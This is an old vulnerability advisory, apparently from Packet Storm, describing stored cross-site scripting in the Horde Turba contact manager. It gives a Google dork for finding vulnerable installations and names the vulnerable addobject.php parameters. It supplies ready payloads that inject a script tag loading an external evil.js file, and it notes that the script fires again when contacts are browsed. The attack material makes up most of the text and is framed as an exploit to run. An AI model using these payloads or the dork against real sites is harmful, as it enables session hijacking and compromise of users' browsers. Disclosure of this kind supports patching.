Horde and Turbo Contact Manager suffers from multiple cross site scripting vulnerabilities.
6eadbbe84f8cd8b298ef48dbfbf36532+==========================================================================+
+ Horde & Turba Contact Manager & XSS Vulnerabilities +
+==========================================================================+
Author(s): Ivan Sanchez
Product: Turba Contact Manager
Web: http://www.horde.org
Versions: Horde & Turba Contact Manager
Date: 13/05/2008
Turba is the Horde contact management application. It is a production level
address book, and makes heavy use of the Horde framework to provide integration
with IMP and other Horde applications.
GOOGLE DORKS:
------------
inurl:"addobject.php?"
Evil Function:
--------------
http://www.site/horde2/turba/addobject.php?
Advanced Search / then inside the form, put evil code:(name/e-mail)form-
Internal Variables:
-------------------
object%5Bemail5D
object%5Btitle5D
First EXPLOIT:
--------------
Insert evil code into these variables,then run the exploit !!!
1-object%5Bemail5D= "><script src=http://site/scripts/evil.js></script>
2-object%5Btitle5D= "><script src=http://site/scripts/evil.js></script>
Second EXPLOIT:
--------------
then if you see your contacts adresses, you will see a lot of insane code XSS there.
If you click on them,exploit again !!!!
http://www.site/horde2/turba/browse.php
Exploit again the evil script!!!!
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+ Horde & Turba Contact Manager & XSS Vulnerabilities +
+==========================================================================+
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!